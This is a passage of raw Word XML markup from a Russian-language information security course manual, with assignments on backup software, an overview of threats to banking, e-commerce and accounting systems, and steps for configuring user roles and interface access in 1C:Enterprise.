          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Методы реализации механизмов защиты информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>План построения системы защиты информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Функции службы информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="206"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задания 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Используя средства Internet и справочные средства программ резервного копирования найти и отобразить с экспортом в Microsoft Word:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="980"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="980" w:hanging="262"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>понятия полного, дифференциального и инкрементного резервного копирования;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="11" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="980"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="980" w:hanging="262"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>описание порядка создания образа и восстановления из него;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="996"/>
        </w:tabs>
        <w:spacing w:line="272" w:lineRule="auto"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>дать сравнительную характеристику основных функций трех программ резервного копирования по следующим критериям: условия распространения, планирование (работа по расписанию), возможности работы с разделами диска, создания загрузочного диска, шифрования, сжатия, настройки фильтров, онлайн резервного копирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="996"/>
        </w:tabs>
        <w:spacing w:line="272" w:lineRule="auto"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1194" w:right="840" w:bottom="1440" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="page19"/>
      <w:bookmarkStart w:id="21" w:name="_Toc3808614"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:t>6. Информационная безопасность отдельных экономических систем</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="304"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Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Основные угрозы безопасности в современных информационных системах банков - вывод из строя, отказ в обслуживании, компрометация или подмена данных (утечка обрабатываемой конфиденциальной информации, ее искажение или разрушение в результате умышленного нарушения работоспособности информационной системы банка).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Безопасность информационной системы банка достигается обеспечением конфиденциальности обрабатываемой ею информации, а также целостности и доступности компонентов и ресурсов системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="934"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>числу методов увеличения безопасности информационной системы банка относится применение системы регистрации и учета, непрерывная проверка на предмет возможного выявления специальных закладных устройств финансового шпионажа с целью получения несущих уязвимую информацию сигналов и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="700"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Существует несколько видов угроз электронной коммерции: проникновение в систему</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>извне: несанкционированный доступ внутри компании и из одной сети в другую, преднамеренный перехват и чтение информации, преднамеренное нарушение данных или сетей, неправильная идентификация пользователя (с целями мошенничества), взлом программно-аппаратной защиты, вирусные атаки, отказ в обслуживании, финансовое мошенничество и т.д.</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Для противодействия этим угрозам используется целый ряд методов: шифрование, электронные цифровые подписи, проверяющие подлинность личности отправителя и получателя; stealth-технологии с использованием электронных ключей; брандмауэры; виртуальные и частные сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Применение современных информационных технологии в бухгалтерском учете связано с такими угрозами информационной безопасности, как проникновение посторонних лиц в базы учетных данных, распространение компьютерных вирусов, фальсификация учетных данных, умышленный или непреднамеренный ошибочный ввод учетных данных (неверные коды, пропущенные учетные записи, несанкционированные учетные операции, ошибки при обработке или выводе данных, формировании или корректировке справочников, неполные учетные записи, неверное отнесение записей по периодам) и т.д.</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Основный принцип, нарушаемый при реализации информационной угрозы в бухгалтерском учете, - это принцип документирования информации. Особую опасность представляют сведения, составляющие коммерческую тайну и относящиеся к учетной и отчетной информации (данные о партнерах, клиентах, банках и т.д.), поэтому необходимо оформить договора с сотрудниками бухгалтерии, финансовых служб и других экономических подразделений с указанием перечня сведений, не подлежащих огласке.</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Также существует угроза отрицания авторства отправителем с целью снятия с себя ответственности за передачу документа.</w:t>
      </w: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Для защиты от угроз информационной безопасности в практике обмена финансовыми документами (платежными поручениями, контрактами, распоряжениями) по компьютерным сетям используются методы аутентификации сообщений при отсутствии у сторон доверия друг к другу. Документ (сообщение) дополняется цифровой подписью и секретным криптографическим ключом. Подделка подписей без знания ключа посторонними лицами исключается и неопровержимо свидетельствует об авторстве.</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242" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Существует несколько уровней обеспечения информационной безопасности в среде «1С:Предприятие» для конфигурации «Бухгалтерский и налоговый учет». После запуска программы имеется два режима работы с системой: «1С: Предприятие», в котором проблема информационной безопасности решается на уровне пользовательского интерфейса и «Конфигуратор» - на уровне администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="979"/>
        </w:tabs>
        <w:spacing w:line="245" w:lineRule="auto"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="page20"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>первом случае в разделе «Сервис» главного меню выберем пункт «Переключить интерфейс» и выберем один из списка интерфейсов с различным набором возможных операций (полный, административный, бухгалтерский, УСН, НДФЛ предпринимателя и т.д.).</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Во втором случае сначала в системе введем несколько физических лиц – пользователей. Для этого в разделе «Кадры» главного меню выберем пункт «Физические лица» и заполним данными трех человек произвольно в окне «Личные данные физического лица» (например, «Имя» – «Иванов ИИ», «Код» – «00000001», «Дата рождения» – «01.01.01», «Пол» – «Мужской» и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1094"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="718"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>разделе «Предприятие» главного меню выберем пункт «Организации» и произвольно введем данные своей фирмы (например, «МММ»).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1130"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>разделе «Предприятие» главного меню выберем пункт «Подразделения организаций» и произвольно введем данные (наименование и код) двух подразделений своей фирмы в окне «Список подразделений организации» (например, «администрация» – «00000002», «бухгалтерия» – «00000001»).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="943"/>
        </w:tabs>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>разделе «Операции» главного меню выберем пункты «Справочники» и «Должности организаций» и произвольно введем данные (наименование и код) трех должностей в окне «Должности организации» (например, «администратор» – «00000002», «главный бухгалтер»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pP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 «00000001», «кассир» – «00000003»).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="979"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>разделе «Кадры» главного меню выберем пункт «Прием на работу» и на основе справочника «Физических лиц» (дата, код, организация и номер) введем данные трех сотрудников нашей фирмы в окне «Прием на работу. Проведен» от текущей даты (например, «Сотрудник» – «Иванов ИИ», «Номер» – «22000000001», «табельный номер» – «00000001», «Должность» – «Главный бухгалтер», «Вид расчета» - «Оклад по дням», «Размер» - «40000», «Подразделение» – «Бухгалтерия», «Дата приема» - «01.01.2017»</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Затем установим пользовательский интерфейс и права доступа для каждого из сотрудников на уровне конфигуратора. Каждому пользователю можно установить роль и интерфейс из списка возможных, а также пароль доступа.</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Для этого откроем «1С: Предприятие» в режиме «Конфигуратор». В разделе «Бухгалтерия предриятия» главного меню выберем пункты «Общие» и «Роли» или «Интерфейсы».</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Роль – это набор прав по каждому объекту системы. Например, для роли «бухгалтер» по объекту «авансовый отчет» в окне «Роль бухгалтер: Права», можно отметить пункты по которым будут доступны соответствующие права (например, чтение, добавление, изменение, удаление и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Интерфейсы – это набор объектов, которые доступны конкретному пользователю. Настроим, например, список панелей интерфейса «Бухгалтерский», а также разделы (подразделы) главного меню используя пункты «Главное меню, «Поддержка» (возможность обновлять конфигурации при их модификациях) и «Стандартные отчеты»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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Для создания новых ролей и новых интерфейсов отключим конфигурацию от автоматического обновления используя раздел «Поддержка» и пункты «Настройка поддержки» и «Снять с поддержки».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Для реализации системы защиты создадим новую роль с именем «кассир» используя раздел «Роли» и пункт «Добавить».</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Для конфигурации в целом поставим галочку «Толстый клиент», что обеспечит пользователю с ролью кассир право доступа в режиме «Толстого клиента», в котором работает конфигурация «Бухгалтерия».</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Отметим все пункты для документа Приходный кассовый ордер и Расходный кассовый ордер.в окне «Роль кассир: Права», во вкладке «Права», поля «Объекты» и «Права».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="248" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Убедимся, что для остальных объектов не установлено никаких прав пользователя с ролью «кассир».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="248" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1194" w:right="840" w:bottom="685" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="page21"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Создать новый интерфейс с именем «инткассир» в разделе «Конфигуратор», пункты «Интерфейсы», пункт контекстного меню «Добавить ». В окне «Интерфейс: Инткассир: Интерфейс» удалим все разделы главного меню в поле «список панелей интерфейса» кроме «Файл» и «Операции» с помощью пункта контекстного меню «Удалить».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pP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Затем с помощью пункта меню «Новая» введем в окне «Свойство: Элемент панели» в поле «Текст» - «Документ», «Тип кнопки» – «Подменю». После создания раздела главного меню «Документ» с помощью пункта «Новая» в окне «Выбор действия» выберем пункты соответствующие двум документам «ПКО» и «РКО» и убедимся в наличии в разделе «Документ» пунктов «РКО» и «ПКО».</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Создадим связь роли «кассир » и интерфейса «инткассир» через пользователя «Иванов», для которого дополнительно установим пароль.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1114"/>
        </w:tabs>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
